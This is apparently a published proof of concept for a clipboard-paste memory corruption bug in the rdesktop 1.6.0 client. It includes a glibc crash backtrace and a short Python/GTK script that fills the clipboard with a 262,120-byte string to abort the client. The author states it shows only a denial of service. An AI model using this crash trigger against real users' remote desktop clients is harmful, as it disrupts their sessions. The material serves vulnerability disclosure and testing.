rdesktop 1.6.0 Memory Corruption (Copy from clipboard) PoC



#rdesktop 1.6.0 Memory Corruption (Copy from clipboard) PoC
#By Dame Jovanoski (badc0re)
#
# Result of placing a 262120-byte string in the clipboard and pasting it into the
# remote session through rdesktop 1.6.0; tested on Ubuntu 9.10.
#
# Usage: run this script (python rdeskop.py) on the machine whose X11 clipboard
# rdesktop reads, so that the oversized string is sitting in the clipboard;
# then, inside the rdesktop session, paste it with Shift+Insert (or Ctrl+V).
#
# Observed result -- glibc's heap-consistency check aborts the rdesktop client
# ("double free or corruption (fasttop)", raised from XFree).  This shows a
# crash / denial of service; control over the corrupted heap metadata is not
# demonstrated here, so exploitability beyond DoS should be treated as unproven.
#
#root@bt:~# rdesktop 192.168.204.133
#WARNING: Remote desktop does not support colour depth 24; falling back to 16
#*** glibc detected *** rdesktop: double free or corruption (fasttop): 0x083f3250 ***
#======= Backtrace: =========
#/lib/tls/i686/cmov/libc.so.6[0xb7a4d454]
#/lib/tls/i686/cmov/libc.so.6(cfree+0x96)[0xb7a4f4b6]
#/usr/lib/libX11.so.6(XFree+0x1d)[0xb7b74fdd]
#rdesktop[0x805f43f]
#rdesktop[0x805a2b6]
#rdesktop[0x80630ff]
#rdesktop[0x80636d8]
#rdesktop[0x8063848]
#rdesktop[0x8064013]
#rdesktop[0x806484b]
#rdesktop[0x80663e3]
#rdesktop[0x80672b9]
#rdesktop[0x8067dbc]
#rdesktop[0x804ec2a]
#/lib/tls/i686/cmov/libc.so.6(__libc_start_main+0xe5)[0xb79f4685]
#rdesktop[0x804ca61]
#======= Memory map: ========
#08048000-0807c000 r-xp 00000000 03:01 114747     /usr/bin/rdesktop
#0807c000-0807d000 r--p 00034000 03:01 114747     /usr/bin/rdesktop
#0807d000-0807f000 rw-p 00035000 03:01 114747     /usr/bin/rdesktop
#0807f000-08418000 rw-p 00000000 00:00 0          [heap]
#b7500000-b7521000 rw-p 00000000 00:00 0
#b7521000-b7600000 ---p 00000000 00:00 0
#b769b000-b771c000 rw-p 00000000 00:00 0
#b791d000-b7925000 r-xp 00000000 03:01 120953     /usr/lib/libXrender.so.1.3.0
#b7925000-b7926000 r--p 00007000 03:01 120953     /usr/lib/libXrender.so.1.3.0
#b7926000-b7927000 rw-p 00008000 03:01 120953     /usr/lib/libXrender.so.1.3.0
#b7927000-b792f000 r-xp 00000000 03:01 120903     /usr/lib/libXcursor.so.1.0.2
#b792f000-b7930000 rw-p 00007000 03:01 120903     /usr/lib/libXcursor.so.1.0.2
#b7933000-b7940000 r-xp 00000000 03:01 105519     /lib/libgcc_s.so.1
#b7940000-b7941000 r--p 0000c000 03:01 105519     /lib/libgcc_s.so.1
#b7941000-b7942000 rw-p 0000d000 03:01 105519     /lib/libgcc_s.so.1
#b7942000-b794c000 r-xp 00000000 03:01 122321     /lib/tls/i686/cmov/libnss_files-2.8.90.so
#b794c000-b794d000 r--p 00009000 03:01 122321     /lib/tls/i686/cmov/libnss_files-2.8.90.so
#b794d000-b794e000 rw-p 0000a000 03:01 122321     /lib/tls/i686/cmov/libnss_files-2.8.90.so
#b794e000-b7957000 r-xp 00000000 03:01 122325     /lib/tls/i686/cmov/libnss_nis-2.8.90.so
#b7957000-b7958000 r--p 00008000 03:01 122325     /lib/tls/i686/cmov/libnss_nis-2.8.90.so
#b7958000-b7959000 rw-p 00009000 03:01 122325     /lib/tls/i686/cmov/libnss_nis-2.8.90.so
#b7959000-b796e000 r-xp 00000000 03:01 122315     /lib/tls/i686/cmov/libnsl-2.8.90.so
#b796e000-b796f000 r--p 00014000 03:01 122315     /lib/tls/i686/cmov/libnsl-2.8.90.so
#b796f000-b7970000 rw-p 00015000 03:01 122315     /lib/tls/i686/cmov/libnsl-2.8.90.so
#b7970000-b7972000 rw-p 00000000 00:00 0
#b7972000-b7979000 r-xp 00000000 03:01 122317     /lib/tls/i686/cmov/libnss_compat-2.8.90.so
#b7979000-b797a000 r--p 00006000 03:01 122317     /lib/tls/i686/cmov/libnss_compat-2.8.90.so
#b797a000-b797b000 rw-p 00007000 03:01 122317     /lib/tls/i686/cmov/libnss_compat-2.8.90.so
#b797b000-b797c000 rw-p 00000000 00:00 0
#b797c000-b7980000 r-xp 00000000 03:01 120909     /usr/lib/libXdmcp.so.6.0.0
#b7980000-b7981000 rw-p 00003000 03:01 120909     /usr/lib/libXdmcp.so.6.0.0
#b7981000-b7982000 rw-p 00000000 00:00 0
#b7982000-b7984000 r-xp 00000000 03:01 120891     /usr/lib/libXau.so.6.0.0
#b7984000-b7985000 rw-p 00001000 03:01 120891     /usr/lib/libXau.so.6.0.0
#b7985000-b799c000 r-xp 00000000 03:01 215752     /usr/lib/libxcb.so.1.0.0
#b799c000-b799d000 r--p 00016000 03:01 215752     /usr/lib/libxcb.so.1.0.0
#b799d000-b799e000 rw-p 00017000 03:01 215752     /usr/lib/libxcb.so.1.0.0
#b799e000-b799f000 r-xp 00000000 03:01 215748     /usr/lib/libxcb-xlib.so.0.0.0
#b799f000-b79a0000 r--p 00000000 03:01 215748     /usr/lib/libxcb-xlib.so.0.0.0
#b79a0000-b79a1000 rw-p 00001000 03:01 215748     /usr/lib/libxcb-xlib.so.0.0.0
#b79a1000-b79a8000 r-xp 00000000 03:01 122334     /lib/tls/i686/cmov/librt-2.8.90.so
#b79a8000-b79a9000 r--p 00007000 03:01 122334     /lib/tls/i686/cmov/librt-2.8.90.so
#b79a9000-b79aa000 rw-p 00008000 03:01 122334     /lib/tls/i686/cmov/librt-2.8.90.so
#b79aa000-b79bf000 r-xp 00000000 03:01 122330     /lib/tls/i686/cmov/libpthread-2.8.90.so
#b79bf000-b79c0000 r--p 00014000 03:01 122330     /lib/tls/i686/cmov/libpthread-2.8.90.so
#b79c0000-b79c1000 rw-p 00015000 03:01 122330     /lib/tls/i686/cmov/libpthread-2.8.90.so
#b79c1000-b79c4000 rw-p 00000000 00:00 0
#b79c4000-b79d8000 r-xp 00000000 03:01 215832     /usr/lib/libz.so.1.2.3.3
#b79d8000-b79da000 rw-p 00013000 03:01 215832     /usr/lib/libz.so.1.2.3.3
#b79da000-b79dc000 r-xp 00000000 03:01 122310     /lib/tls/i686/cmov/libdl-2.8.90.so
#b79dc000-b79dd000 r--p 00001000 03:01 122310     /lib/tls/i686/cmov/libdl-2.8.90.so
#[... remainder of the memory map truncated in the original capture ...]
#Aborted

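from struct import *
import sys
import time

import pygtk
pygtk.require('2.0')
import gtk

# Payload that produced the glibc abort quoted in the header: 262120 bytes
# (0x3FFE8, just under 256 KiB) of 'A'.  Whether smaller or other sizes also
# trigger the crash was not explored here -- NOTE(review): confirm the
# boundary before relying on this exact value.
PAYLOAD_LEN = 262120
PAYLOAD_FILL = "\x41"  # 'A'


def build_payload(length=PAYLOAD_LEN, fill=PAYLOAD_FILL):
    """Return ``length`` repetitions of ``fill`` -- the clipboard payload.

    A non-positive ``length`` yields an empty string (Python repetition
    semantics), which does not exercise the bug; pass a positive value.
    """
    return fill * length


def load_clipboard(payload):
    """Place ``payload`` on the X11 CLIPBOARD selection and ask it to persist.

    Returns True when GTK accepted the text, False when the clipboard could
    not be obtained or written (for example, no usable DISPLAY).  The failure
    is reported on stderr instead of being swallowed silently, and only
    Exception subclasses are caught so Ctrl-C (KeyboardInterrupt) still
    interrupts the run -- the original bare ``except:`` hid both.
    """
    try:
        # gtk.clipboard_get() with no argument targets the CLIPBOARD
        # selection.  If Shift+Insert pastes PRIMARY in your environment,
        # use gtk.clipboard_get(gtk.gdk.SELECTION_PRIMARY) instead.
        clipboard = gtk.clipboard_get()
        clipboard.set_text(payload)
        # store() asks the clipboard manager to keep the content after this
        # process exits; harmless when no manager is running.
        clipboard.store()
    except Exception as exc:
        sys.stderr.write("String cannot be copied into clipboard: %s\n" % (exc,))
        return False
    return True


def main():
    """Announce, build the payload, load it into the clipboard.

    Exits with status 0 on success and 1 when the clipboard could not be set,
    so the script can be chained from a shell.
    """
    for dots in (".", "..", "..."):
        print("Creating exploit" + dots)
        time.sleep(1)
    payload = build_payload()
    if load_clipboard(payload):
        print("String is copied into clipboard (%d bytes)." % len(payload))
        sys.exit(0)
    sys.exit(1)


if __name__ == "__main__":
    main()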
